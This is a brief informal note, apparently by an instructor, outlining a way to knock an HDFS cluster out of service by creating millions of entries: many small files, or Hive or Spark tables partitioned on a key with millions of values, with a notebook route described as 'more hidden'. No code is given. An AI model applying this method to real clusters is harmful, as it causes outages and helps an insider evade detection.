Another idea (which came about in a conversation with a security guardian at a company where I was teaching).
Create millions of entries in the HDFS, and this will take it out of services. A few ways to do it:
- Write many small files with a script.
- Partition a Hive table on a key that has millions of values. This approach can work with a Python notebook, which gives this option. Thus it can be more hidden.
- Create this as a partitioned table from Spark.